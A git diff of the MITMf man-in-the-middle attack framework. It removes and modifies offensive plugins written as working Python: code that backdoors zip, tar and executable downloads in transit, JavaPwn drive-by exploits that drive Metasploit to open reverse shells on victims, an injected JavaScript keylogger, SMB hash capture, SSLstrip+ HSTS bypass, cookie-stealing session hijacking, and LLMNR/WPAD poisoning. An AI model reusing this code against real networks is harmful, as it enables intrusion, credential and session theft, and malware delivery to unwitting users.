- mitmf_logger.info('Tar blacklist enforced on {}'.format(info.name)) - continue - - # Try to patch - extractedFile = tarFile.extractfile(info) - - if patchCount >= int(self.userConfig['TAR']['patchCount']): - newTarFile.addfile(info, extractedFile) - else: - # create the file on disk temporarily for fileGrinder to run on it - with tempfile.NamedTemporaryFile() as tmp: - shutil.copyfileobj(extractedFile, tmp) - tmp.flush() - patchResult = self.binaryGrinder(tmp.name) - if patchResult: - patchCount += 1 - file2 = "backdoored/" + os.path.basename(tmp.name) - print "[*] Patching complete, adding to tar file." - info.size = os.stat(file2).st_size - with open(file2, 'rb') as f: - newTarFile.addfile(info, f) - mitmf_logger.info("{} in tar patched, adding to tarfile".format(info.name)) - os.remove(file2) - wasPatched = True - else: - print "[!] Patching failed" - with open(tmp.name, 'rb') as f: - newTarFile.addfile(info, f) - mitmf_logger.info("{} patching failed. Keeping original file in tar.".format(info.name)) - if patchCount == int(self.userConfig['TAR']['patchCount']): - mitmf_logger.info("Met Tar config patchCount limit.") - - # finalize the writing of the tar file first - newTarFile.close() - - # then read the new tar file into memory - newTarFileStorage.seek(0) - ret = newTarFileStorage.read() - newTarFileStorage.close() # it's automatically deleted - - if wasPatched is False: - # If nothing was changed return the original - print "[*] No files were patched forwarding original file" - self.patched.put(aTarFileBytes) - return - else: - self.patched.put(ret) - return - - def zip_files(self, aZipFile): - "When called will unpack and edit a Zip File and return a zip file" - - print "[*] ZipFile size:", len(aZipFile) / 1024, 'KB' - - if len(aZipFile) > int(self.userConfig['ZIP']['maxSize']): - print "[!] ZipFile over allowed size" - mitmf_logger.info("ZipFIle maxSize met {}".format(len(aZipFile))) - self.patched.put(aZipFile) - return - - tmpRan = ''.join(random.choice(string.ascii_lowercase + string.digits + string.ascii_uppercase) for _ in range(8)) - tmpDir = '/tmp/' + tmpRan - tmpFile = '/tmp/' + tmpRan + '.zip' - - os.mkdir(tmpDir) - - with open(tmpFile, 'w') as f: - f.write(aZipFile) - - zippyfile = zipfile.ZipFile(tmpFile, 'r') - - #encryption test - try: - zippyfile.testzip() - - except RuntimeError as e: - if 'encrypted' in str(e): - mitmf_logger.info('Encrypted zipfile found. Not patching.') - return aZipFile - - print "[*] ZipFile contents and info:" - - for info in zippyfile.infolist(): - print "\t", info.filename, info.date_time, info.file_size - - zippyfile.extractall(tmpDir) - - patchCount = 0 - - wasPatched = False - - for info in zippyfile.infolist(): - print "[*] >>> Next file in zipfile:", info.filename - - if os.path.isdir(tmpDir + '/' + info.filename) is True: - print info.filename, 'is a directory' - continue - - #Check against keywords - keywordCheck = False - - if type(self.zipblacklist) is str: - if self.zipblacklist.lower() in info.filename.lower(): - keywordCheck = True - - else: - for keyword in self.zipblacklist: - if keyword.lower() in info.filename.lower(): - keywordCheck = True - continue - - if keywordCheck is True: - print "[!] Zip blacklist enforced!" - mitmf_logger.info('Zip blacklist enforced on {}'.format(info.filename)) - continue - - patchResult = self.binaryGrinder(tmpDir + '/' + info.filename) - - if patchResult: - patchCount += 1 - file2 = "backdoored/" + os.path.basename(info.filename) - print "[*] Patching complete, adding to zip file." 
- shutil.copyfile(file2, tmpDir + '/' + info.filename) - mitmf_logger.info("{} in zip patched, adding to zipfile".format(info.filename)) - os.remove(file2) - wasPatched = True - else: - print "[!] Patching failed" - mitmf_logger.info("{} patching failed. Keeping original file in zip.".format(info.filename)) - - print '-' * 10 - - if patchCount >= int(self.userConfig['ZIP']['patchCount']): # Make this a setting. - mitmf_logger.info("Met Zip config patchCount limit.") - break - - zippyfile.close() - - zipResult = zipfile.ZipFile(tmpFile, 'w', zipfile.ZIP_DEFLATED) - - print "[*] Writing to zipfile:", tmpFile - - for base, dirs, files in os.walk(tmpDir): - for afile in files: - filename = os.path.join(base, afile) - print '[*] Writing filename to zipfile:', filename.replace(tmpDir + '/', '') - zipResult.write(filename, arcname=filename.replace(tmpDir + '/', '')) - - zipResult.close() - #clean up - shutil.rmtree(tmpDir) - - with open(tmpFile, 'rb') as f: - tempZipFile = f.read() - os.remove(tmpFile) - - if wasPatched is False: - print "[*] No files were patched forwarding original file" - self.patched.put(aZipFile) - return - else: - self.patched.put(tempZipFile) - return - - def handleResponse(self, request, data): - - content_header = request.client.headers['Content-Type'] - client_ip = request.client.getClientIP() - - if content_header in self.zipMimeTypes: - - if self.bytes_have_format(data, 'zip'): - mitmf_logger.info("{} Detected supported zip file type!".format(client_ip)) - - process = multiprocessing.Process(name='zip', target=self.zip, args=(data,)) - process.daemon = True - process.start() - process.join() - bd_zip = self.patched.get() - - if bd_zip: - mitmf_logger.info("{} Patching complete, forwarding to client".format(client_ip)) - return {'request': request, 'data': bd_zip} - - else: - for tartype in ['gz','bz','tar']: - if self.bytes_have_format(data, tartype): - mitmf_logger.info("{} Detected supported tar file type!".format(client_ip)) - - process = multiprocessing.Process(name='tar_files', target=self.tar_files, args=(data,)) - process.daemon = True - process.start() - process.join() - bd_tar = self.patched.get() - - if bd_tar: - mitmf_logger.info("{} Patching complete, forwarding to client".format(client_ip)) - return {'request': request, 'data': bd_tar} - - - elif content_header in self.binaryMimeTypes: - for bintype in ['pe','elf','fatfile','machox64','machox86']: - if self.bytes_have_format(data, bintype): - mitmf_logger.info("{} Detected supported binary type!".format(client_ip)) - fd, tmpFile = mkstemp() - with open(tmpFile, 'w') as f: - f.write(data) - - process = multiprocessing.Process(name='binaryGrinder', target=self.binaryGrinder, args=(tmpFile,)) - process.daemon = True - process.start() - process.join() - patchb = self.patched.get() - - if patchb: - bd_binary = open("backdoored/" + os.path.basename(tmpFile), "rb").read() - os.remove('./backdoored/' + os.path.basename(tmpFile)) - mitmf_logger.info("{} Patching complete, forwarding to client".format(client_ip)) - return {'request': request, 'data': bd_binary} - - else: - mitmf_logger.debug("{} File is not of supported Content-Type: {}".format(client_ip, content_header)) - return {'request': request, 'data': data} \ No newline at end of file diff --git a/plugins/Inject.py b/plugins/Inject.py index 68cd277..a28375b 100644 --- a/plugins/Inject.py +++ b/plugins/Inject.py @@ -24,15 +24,10 @@ import re import sys import argparse -logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when 
importing scapy -from scapy.all import get_if_addr - from core.utils import SystemConfig from plugins.plugin import Plugin from plugins.CacheKill import CacheKill -mitmf_logger = logging.getLogger('mitmf') - class Inject(CacheKill, Plugin): name = "Inject" optname = "inject" diff --git a/plugins/JavaPwn.py b/plugins/JavaPwn.py deleted file mode 100644 index 15a292d..0000000 --- a/plugins/JavaPwn.py +++ /dev/null @@ -1,235 +0,0 @@ -#!/usr/bin/env python2.7 - -# Copyright (c) 2014-2016 Marcello Salvati -# -# This program is free software; you can redistribute it and/or -# modify it under the terms of the GNU General Public License as -# published by the Free Software Foundation; either version 3 of the -# License, or (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, but -# WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 -# USA -# - -import string -import random -import threading -import sys -import logging - -from core.msfrpc import Msfrpc -from plugins.plugin import Plugin -from plugins.BrowserProfiler import BrowserProfiler -from time import sleep - -logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy -from scapy.all import get_if_addr - -requests_log = logging.getLogger("requests") #Disables "Starting new HTTP Connection (1)" log message -requests_log.setLevel(logging.WARNING) - -mitmf_logger = logging.getLogger('mitmf') - -class JavaPwn(BrowserProfiler, Plugin): - name = "JavaPwn" - optname = "javapwn" - desc = "Performs drive-by attacks on clients with out-of-date java browser plugins" - tree_output = [] - depends = ["Browserprofiler"] - version = "0.3" - has_opts = False - - def initialize(self, options): - '''Called if plugin is enabled, passed the options namespace''' - self.options = options - self.msfip = options.ip_address - self.sploited_ips = [] #store ip of pwned or not vulnerable clients so we don't re-exploit - - try: - msfcfg = options.configfile['MITMf']['Metasploit'] - except Exception, e: - sys.exit("[-] Error parsing Metasploit options in config file : " + str(e)) - - try: - self.javacfg = options.configfile['JavaPwn'] - except Exception, e: - sys.exit("[-] Error parsing config for JavaPwn: " + str(e)) - - self.msfport = msfcfg['msfport'] - self.rpcip = msfcfg['rpcip'] - self.rpcpass = msfcfg['rpcpass'] - - #Initialize the BrowserProfiler plugin - BrowserProfiler.initialize(self, options) - self.black_ips = [] - - try: - msf = Msfrpc({"host": self.rpcip}) #create an instance of msfrpc libarary - msf.login('msf', self.rpcpass) - version = msf.call('core.version')['version'] - self.tree_output.append("Connected to Metasploit v%s" % version) - except Exception: - sys.exit("[-] Error connecting to MSF! 
Make sure you started Metasploit and its MSGRPC server") - - t = threading.Thread(name='pwn', target=self.pwn, args=(msf,)) - t.setDaemon(True) - t.start() #start the main thread - - def rand_url(self): #generates a random url for our exploits (urls are generated with a / at the beginning) - return "/" + ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(5)) - - def get_exploit(self, java_version): - exploits = [] - - client_vstring = java_version[:-len(java_version.split('.')[3])-1] - client_uversion = int(java_version.split('.')[3]) - - for ver in self.javacfg['Multi'].iteritems(): - if type(ver[1]) is list: - for list_vers in ver[1]: - - version_string = list_vers[:-len(list_vers.split('.')[3])-1] - update_version = int(list_vers.split('.')[3]) - - if ('*' in version_string[:1]) and (client_vstring == version_string[1:]): - if client_uversion == update_version: - exploits.append(ver[0]) - elif (client_vstring == version_string): - if client_uversion <= update_version: - exploits.append(ver[0]) - else: - version_string = ver[1][:-len(ver[1].split('.')[3])-1] - update_version = int(ver[1].split('.')[3]) - - if ('*' in version_string[:1]) and (client_vstring == version_string[1:]): - if client_uversion == update_version: - exploits.append(ver[0]) - elif client_vstring == version_string: - if client_uversion <= update_version: - exploits.append(ver[0]) - - return exploits - - - def injectWait(self, msfinstance, url, client_ip): #here we inject an iframe to trigger the exploit and check for resulting sessions - #inject iframe - mitmf_logger.info("%s >> now injecting iframe to trigger exploit" % client_ip) - self.html_payload = "" % (self.msfip, self.msfport, url) #temporarily changes the code that the Browserprofiler plugin injects - - mitmf_logger.info('%s >> waiting for ze shellz, Please wait...' % client_ip) - - exit = False - i = 1 - while i <= 30: #wait max 60 seconds for a new shell - if exit: - break - shell = msfinstance.call('session.list') #poll metasploit every 2 seconds for new sessions - if len(shell) > 0: - for k, v in shell.iteritems(): - if client_ip in shell[k]['tunnel_peer']: #make sure the shell actually came from the ip that we targeted - mitmf_logger.info("%s >> Got shell!" 
% client_ip) - self.sploited_ips.append(client_ip) #target successfuly exploited :) - self.black_ips = self.sploited_ips #Add to inject blacklist since box has been popped - exit = True - break - sleep(2) - i += 1 - - if exit is False: #We didn't get a shell :( - mitmf_logger.info("%s >> session not established after 30 seconds" % client_ip) - - self.html_payload = self.get_payload() # restart the BrowserProfiler plugin - - def send_command(self, cmd, msf, vic_ip): - try: - mitmf_logger.info("%s >> sending commands to metasploit" % vic_ip) - - #Create a virtual console - console_id = msf.call('console.create')['id'] - - #write the cmd to the newly created console - msf.call('console.write', [console_id, cmd]) - - mitmf_logger.info("%s >> commands sent succesfully" % vic_ip) - except Exception, e: - mitmf_logger.info('%s >> Error accured while interacting with metasploit: %s:%s' % (vic_ip, Exception, e)) - - def pwn(self, msf): - while True: - if (len(self.dic_output) > 0) and self.dic_output['java_installed'] == '1': #only choose clients that we are 100% sure have the java plugin installed and enabled - - brwprofile = self.dic_output #self.dic_output is the output of the BrowserProfiler plugin in a dictionary format - - if brwprofile['ip'] not in self.sploited_ips: #continue only if the ip has not been already exploited - - vic_ip = brwprofile['ip'] - - mitmf_logger.info("%s >> client has java version %s installed! Proceeding..." % (vic_ip, brwprofile['java_version'])) - mitmf_logger.info("%s >> Choosing exploit based on version string" % vic_ip) - - exploits = self.get_exploit(brwprofile['java_version']) # get correct exploit strings defined in javapwn.cfg - - if exploits: - - if len(exploits) > 1: - mitmf_logger.info("%s >> client is vulnerable to %s exploits!" % (vic_ip, len(exploits))) - exploit = random.choice(exploits) - mitmf_logger.info("%s >> choosing %s" %(vic_ip, exploit)) - else: - mitmf_logger.info("%s >> client is vulnerable to %s!" 
% (vic_ip, exploits[0])) - exploit = exploits[0] - - #here we check to see if we already set up the exploit to avoid creating new jobs for no reason - jobs = msf.call('job.list') #get running jobs - if len(jobs) > 0: - for k, v in jobs.iteritems(): - info = msf.call('job.info', [k]) - if exploit in info['name']: - mitmf_logger.info('%s >> %s already started' % (vic_ip, exploit)) - url = info['uripath'] #get the url assigned to the exploit - self.injectWait(msf, url, vic_ip) - - else: #here we setup the exploit - rand_port = random.randint(1000, 65535) #generate a random port for the payload listener - rand_url = self.rand_url() - #generate the command string to send to the virtual console - #new line character very important as it simulates a user pressing enter - cmd = "use exploit/%s\n" % exploit - cmd += "set SRVPORT %s\n" % self.msfport - cmd += "set URIPATH %s\n" % rand_url - cmd += "set PAYLOAD generic/shell_reverse_tcp\n" #chose this payload because it can be upgraded to a full-meterpreter and its multi-platform - cmd += "set LHOST %s\n" % self.msfip - cmd += "set LPORT %s\n" % rand_port - cmd += "exploit -j\n" - - mitmf_logger.debug("command string:\n%s" % cmd) - - self.send_command(cmd, msf, vic_ip) - - self.injectWait(msf, rand_url, vic_ip) - else: - #this might be removed in the future since newer versions of Java break the signed applet attack (unless you have a valid cert) - mitmf_logger.info("%s >> client is not vulnerable to any java exploit" % vic_ip) - mitmf_logger.info("%s >> falling back to the signed applet attack" % vic_ip) - - rand_url = self.rand_url() - rand_port = random.randint(1000, 65535) - - cmd = "use exploit/multi/browser/java_signed_applet\n" - cmd += "set SRVPORT %s\n" % self.msfport - cmd += "set URIPATH %s\n" % rand_url - cmd += "set PAYLOAD generic/shell_reverse_tcp\n" - cmd += "set LHOST %s\n" % self.msfip - cmd += "set LPORT %s\n" % rand_port - cmd += "exploit -j\n" - - self.send_command(cmd, msf, vic_ip) - self.injectWait(msf, rand_url, vic_ip) - sleep(1) diff --git a/plugins/JsKeylogger.py b/plugins/JsKeylogger.py deleted file mode 100644 index 8acfe96..0000000 --- a/plugins/JsKeylogger.py +++ /dev/null @@ -1,169 +0,0 @@ -#!/usr/bin/env python2.7 - -# Copyright (c) 2014-2016 Marcello Salvati -# -# This program is free software; you can redistribute it and/or -# modify it under the terms of the GNU General Public License as -# published by the Free Software Foundation; either version 3 of the -# License, or (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, but -# WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# General Public License for more details. 
-# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 -# USA -# - -from plugins.plugin import Plugin -from plugins.Inject import Inject -import logging - -mitmf_logger = logging.getLogger('mitmf') - -class jskeylogger(Inject, Plugin): - name = "Javascript Keylogger" - optname = "jskeylogger" - desc = "Injects a javascript keylogger into clients webpages" - implements = ["handleResponse", "handleHeader", "connectionMade", "sendPostData"] - depends = ["Inject"] - version = "0.2" - has_opts = False - - def initialize(self, options): - Inject.initialize(self, options) - self.html_payload = self.msf_keylogger() - - def sendPostData(self, request): - #Handle the plugin output - if 'keylog' in request.uri: - - raw_keys = request.postData.split("&&")[0] - keys = raw_keys.split(",") - del keys[0]; del(keys[len(keys)-1]) - - input_field = request.postData.split("&&")[1] - - nice = '' - for n in keys: - if n == '9': - nice += "" - elif n == '8': - nice = nice.replace(nice[-1:], "") - elif n == '13': - nice = '' - else: - try: - nice += n.decode('hex') - except: - mitmf_logger.warning("%s ERROR decoding char: %s" % (request.client.getClientIP(), n)) - - #try: - # input_field = input_field.decode('hex') - #except: - # mitmf_logger.warning("%s ERROR decoding input field name: %s" % (request.client.getClientIP(), input_field)) - - mitmf_logger.warning("%s [%s] Field: %s Keys: %s" % (request.client.getClientIP(), request.headers['host'], input_field, nice)) - - def msf_keylogger(self): - #Stolen from the Metasploit module http_javascript_keylogger - - payload = """""" - - return payload \ No newline at end of file diff --git a/plugins/Replace.py b/plugins/Replace.py deleted file mode 100644 index f623736..0000000 --- a/plugins/Replace.py +++ /dev/null @@ -1,105 +0,0 @@ -#!/usr/bin/env python2.7 - -# Copyright (c) 2014-2016 Marcello Salvati -# -# This program is free software; you can redistribute it and/or -# modify it under the terms of the GNU General Public License as -# published by the Free Software Foundation; either version 3 of the -# License, or (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, but -# WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# General Public License for more details. 
-# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 -# USA -# - -""" -Plugin by @rubenthijssen -""" - -import sys -import logging -import time -import re -from plugins.plugin import Plugin -from plugins.CacheKill import CacheKill - -mitmf_logger = logging.getLogger('mitmf') - -class Replace(CacheKill, Plugin): - name = "Replace" - optname = "replace" - desc = "Replace arbitrary content in HTML content" - implements = ["handleResponse", "handleHeader", "connectionMade"] - depends = ["CacheKill"] - version = "0.1" - has_opts = True - - def initialize(self, options): - self.options = options - - self.search_str = options.search_str - self.replace_str = options.replace_str - self.regex_file = options.regex_file - - if (self.search_str is None or self.search_str == "") and self.regex_file is None: - sys.exit("[-] Please provide a search string or a regex file") - - self.regexes = [] - if self.regex_file is not None: - for line in self.regex_file: - self.regexes.append(line.strip().split("\t")) - - if self.options.keep_cache: - self.implements.remove("handleHeader") - self.implements.remove("connectionMade") - - self.ctable = {} - self.dtable = {} - self.mime = "text/html" - - def handleResponse(self, request, data): - ip, hn, mime = self._get_req_info(request) - - if self._should_replace(ip, hn, mime): - - if self.search_str is not None and self.search_str != "": - data = data.replace(self.search_str, self.replace_str) - mitmf_logger.info("%s [%s] Replaced '%s' with '%s'" % (request.client.getClientIP(), request.headers['host'], self.search_str, self.replace_str)) - - # Did the user provide us with a regex file? - for regex in self.regexes: - try: - data = re.sub(regex[0], regex[1], data) - - mitmf_logger.info("%s [%s] Occurances matching '%s' replaced with '%s'" % (request.client.getClientIP(), request.headers['host'], regex[0], regex[1])) - except Exception: - logging.error("%s [%s] Your provided regex (%s) or replace value (%s) is empty or invalid. Please debug your provided regex(es)" % (request.client.getClientIP(), request.headers['host'], regex[0], regex[1])) - - self.ctable[ip] = time.time() - self.dtable[ip+hn] = True - - return {'request': request, 'data': data} - - return - - def add_options(self, options): - options.add_argument("--search-str", type=str, default=None, help="String you would like to replace --replace-str with. Default: '' (empty string)") - options.add_argument("--replace-str", type=str, default="", help="String you would like to replace.") - options.add_argument("--regex-file", type=file, help="Load file with regexes. 
File format: [tab][new-line]") - options.add_argument("--keep-cache", action="store_true", help="Don't kill the server/client caching.") - - def _should_replace(self, ip, hn, mime): - return mime.find(self.mime) != -1 - - def _get_req_info(self, request): - ip = request.client.getClientIP() - hn = request.client.getRequestHostname() - mime = request.client.headers['Content-Type'] - - return (ip, hn, mime) diff --git a/plugins/Responder.py b/plugins/Responder.py index 81c0186..676553f 100644 --- a/plugins/Responder.py +++ b/plugins/Responder.py @@ -23,9 +23,10 @@ import os import threading from plugins.plugin import Plugin -from libs.responder.Responder import ResponderMITMf -from core.sslstrip.DnsCache import DnsCache from twisted.internet import reactor +from core.responder.wpad.WPADPoisoner import WPADPoisoner +from core.responder.llmnr.LLMNRPoisoner import LLMNRPoisoner +from core.utils import SystemConfig class Responder(Plugin): name = "Responder" @@ -37,37 +38,32 @@ class Responder(Plugin): def initialize(self, options): '''Called if plugin is enabled, passed the options namespace''' - self.options = options + self.options = options self.interface = options.interface + self.ourip = SystemConfig.getIP(options.interface) try: - config = options.configfile['Responder'] + config = self.config['Responder'] except Exception, e: sys.exit('[-] Error parsing config for Responder: ' + str(e)) - if options.Analyze: + LLMNRPoisoner().start(options, self.ourip) + + if options.wpad: + WPADPoisoner().start() + + if options.analyze: self.tree_output.append("Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned") - resp = ResponderMITMf() - resp.setCoreVars(options, config) - - result = resp.AnalyzeICMPRedirect() - if result: - for line in result: - self.tree_output.append(line) - - resp.printDebugInfo() - resp.start() - - def plugin_reactor(self, strippingFactory): + def pluginReactor(self, strippingFactory): reactor.listenTCP(3141, strippingFactory) def add_options(self, options): - options.add_argument('--analyze', dest="Analyze", action="store_true", help="Allows you to see NBT-NS, BROWSER, LLMNR requests from which workstation to which workstation without poisoning") - options.add_argument('--basic', dest="Basic", default=False, action="store_true", help="Set this if you want to return a Basic HTTP authentication. If not set, an NTLM authentication will be returned") - options.add_argument('--wredir', dest="Wredirect", default=False, action="store_true", help="Set this to enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network (like classics 'nbns spoofer' would). Default value is therefore set to False") - options.add_argument('--nbtns', dest="NBTNSDomain", default=False, action="store_true", help="Set this to enable answers for netbios domain suffix queries. Answering to domain suffixes will likely break stuff on the network (like a classic 'nbns spoofer' would). Default value is therefore set to False") - options.add_argument('--fingerprint', dest="Finger", default=False, action="store_true", help = "This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query") - options.add_argument('--wpad', dest="WPAD_On_Off", default=False, action="store_true", help = "Set this to start the WPAD rogue proxy server. 
Default value is False") - options.add_argument('--forcewpadauth', dest="Force_WPAD_Auth", default=False, action="store_true", help = "Set this if you want to force NTLM/Basic authentication on wpad.dat file retrieval. This might cause a login prompt in some specific cases. Therefore, default value is False") - options.add_argument('--lm', dest="LM_On_Off", default=False, action="store_true", help="Set this if you want to force LM hashing downgrade for Windows XP/2003 and earlier. Default value is False") + options.add_argument('--analyze', dest="analyze", action="store_true", help="Allows you to see NBT-NS, BROWSER, LLMNR requests from which workstation to which workstation without poisoning") + options.add_argument('--basic', dest="basic", default=False, action="store_true", help="Set this if you want to return a Basic HTTP authentication. If not set, an NTLM authentication will be returned") + options.add_argument('--wredir', dest="wredir", default=False, action="store_true", help="Set this to enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network (like classics 'nbns spoofer' would). Default value is therefore set to False") + options.add_argument('--nbtns', dest="nbtns", default=False, action="store_true", help="Set this to enable answers for netbios domain suffix queries. Answering to domain suffixes will likely break stuff on the network (like a classic 'nbns spoofer' would). Default value is therefore set to False") + options.add_argument('--fingerprint', dest="finger", default=False, action="store_true", help = "This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query") + options.add_argument('--wpad', dest="wpad", default=False, action="store_true", help = "Set this to start the WPAD rogue proxy server. Default value is False") + options.add_argument('--forcewpadauth', dest="forceWpadAuth", default=False, action="store_true", help = "Set this if you want to force NTLM/Basic authentication on wpad.dat file retrieval. This might cause a login prompt in some specific cases. Therefore, default value is False") + options.add_argument('--lm', dest="lm", default=False, action="store_true", help="Set this if you want to force LM hashing downgrade for Windows XP/2003 and earlier. Default value is False") diff --git a/plugins/SMBAuth.py b/plugins/SMBAuth.py deleted file mode 100644 index a1df8fe..0000000 --- a/plugins/SMBAuth.py +++ /dev/null @@ -1,49 +0,0 @@ -#!/usr/bin/env python2.7 - -# Copyright (c) 2014-2016 Marcello Salvati -# -# This program is free software; you can redistribute it and/or -# modify it under the terms of the GNU General Public License as -# published by the Free Software Foundation; either version 3 of the -# License, or (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, but -# WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# General Public License for more details. 
-# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 -# USA -# - -from plugins.plugin import Plugin -from plugins.Inject import Inject -import sys -import logging - -class SMBAuth(Inject, Plugin): - name = "SMBAuth" - optname = "smbauth" - desc = "Evoke SMB challenge-response auth attempts" - depends = ["Inject"] - version = "0.1" - has_opts = True - - def initialize(self, options): - Inject.initialize(self, options) - self.target_ip = options.host - - if not self.target_ip: - self.target_ip = options.ip_address - - self.html_payload = self._get_data() - - def add_options(self, options): - options.add_argument("--host", type=str, default=None, help="The ip address of your capture server [default: interface IP]") - - def _get_data(self): - return ''\ - ''\ - '' % tuple([self.target_ip]*3) diff --git a/plugins/SSLstrip+.py b/plugins/SSLstrip+.py deleted file mode 100644 index 282b909..0000000 --- a/plugins/SSLstrip+.py +++ /dev/null @@ -1,56 +0,0 @@ -#!/usr/bin/env python2.7 - -# Copyright (c) 2014-2016 Marcello Salvati -# -# This program is free software; you can redistribute it and/or -# modify it under the terms of the GNU General Public License as -# published by the Free Software Foundation; either version 3 of the -# License, or (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, but -# WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 -# USA -# - -import sys -import logging - -from plugins.plugin import Plugin -from core.utils import IpTables -from core.sslstrip.URLMonitor import URLMonitor -from core.dnschef.dnschef import DNSChef - -class HSTSbypass(Plugin): - name = 'SSLstrip+' - optname = 'hsts' - desc = 'Enables SSLstrip+ for partial HSTS bypass' - version = "0.4" - tree_output = ["SSLstrip+ by Leonardo Nve running"] - has_opts = False - - def initialize(self, options): - self.options = options - self.manualiptables = options.manualiptables - - try: - hstsconfig = options.configfile['SSLstrip+'] - except Exception, e: - sys.exit("[-] Error parsing config for SSLstrip+: " + str(e)) - - if not options.manualiptables: - if IpTables.getInstance().dns is False: - IpTables.getInstance().DNS(options.ip_address, options.configfile['MITMf']['DNS']['port']) - - URLMonitor.getInstance().setHstsBypass(hstsconfig) - DNSChef.getInstance().setHstsBypass(hstsconfig) - - def finish(self): - if not self.manualiptables: - if IpTables.getInstance().dns is True: - IpTables.getInstance().Flush() \ No newline at end of file diff --git a/plugins/SessionHijacker.py b/plugins/SessionHijacker.py deleted file mode 100644 index ff9a3ec..0000000 --- a/plugins/SessionHijacker.py +++ /dev/null @@ -1,187 +0,0 @@ -#!/usr/bin/env python2.7 - -# Copyright (c) 2014-2016 Marcello Salvati -# -# This program is free software; you can redistribute it and/or -# modify it under the terms of the GNU General Public License as -# published by the Free Software Foundation; either version 3 of the -# License, or (at your option) any later version. 
-# -# This program is distributed in the hope that it will be useful, but -# WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 -# USA -# - -#Almost all of the Firefox related code was stolen from Firelamb https://github.com/sensepost/mana/tree/master/firelamb - -from plugins.plugin import Plugin -from core.publicsuffix.publicsuffix import PublicSuffixList -from urlparse import urlparse -import threading -import os -import sys -import time -import logging -import sqlite3 -import json -import socket - -mitmf_logger = logging.getLogger('mitmf') - -class SessionHijacker(Plugin): - name = "Session Hijacker" - optname = "hijack" - desc = "Performs session hijacking attacks against clients" - implements = ["cleanHeaders"] #["handleHeader"] - version = "0.1" - has_opts = True - - def initialize(self, options): - '''Called if plugin is enabled, passed the options namespace''' - self.options = options - self.psl = PublicSuffixList() - self.firefox = options.firefox - self.mallory = options.mallory - self.save_dir = "./logs" - self.seen_hosts = {} - self.sql_conns = {} - self.sessions = [] - self.html_header="

<html>\n<head>\n<title> Cookies sniffed for the following domains\n</title>\n</head>\n<body>\n
" - - #Recent versions of Firefox use "PRAGMA journal_mode=WAL" which requires - #SQLite version 3.7.0 or later. You won't be able to read the database files - #with SQLite version 3.6.23.1 or earlier. You'll get the "file is encrypted - #or is not a database" message. - - sqlv = sqlite3.sqlite_version.split('.') - if (sqlv[0] <3 or sqlv[1] < 7): - sys.exit("[-] sqlite3 version 3.7 or greater required") - - if not os.path.exists("./logs"): - os.makedirs("./logs") - - if self.mallory: - t = threading.Thread(name='mallory_server', target=self.mallory_server, args=()) - t.setDaemon(True) - t.start() - - def cleanHeaders(self, request): # Client => Server - headers = request.getAllHeaders().copy() - client_ip = request.getClientIP() - - if 'cookie' in headers: - - if self.firefox: - url = "http://" + headers['host'] + request.getPathFromUri() - for cookie in headers['cookie'].split(';'): - eq = cookie.find("=") - cname = str(cookie)[0:eq].strip() - cvalue = str(cookie)[eq+1:].strip() - self.firefoxdb(headers['host'], cname, cvalue, url, client_ip) - - mitmf_logger.info("%s << Inserted cookie into firefox db" % client_ip) - - if self.mallory: - if len(self.sessions) > 0: - temp = [] - for session in self.sessions: - temp.append(session[0]) - if headers['host'] not in temp: - self.sessions.append((headers['host'], headers['cookie'])) - mitmf_logger.info("%s Got client cookie: [%s] %s" % (client_ip, headers['host'], headers['cookie'])) - mitmf_logger.info("%s Sent cookie to browser extension" % client_ip) - else: - self.sessions.append((headers['host'], headers['cookie'])) - mitmf_logger.info("%s Got client cookie: [%s] %s" % (client_ip, headers['host'], headers['cookie'])) - mitmf_logger.info("%s Sent cookie to browser extension" % client_ip) - - #def handleHeader(self, request, key, value): # Server => Client - # if 'set-cookie' in request.client.headers: - # cookie = request.client.headers['set-cookie'] - # #host = request.client.headers['host'] #wtf???? 
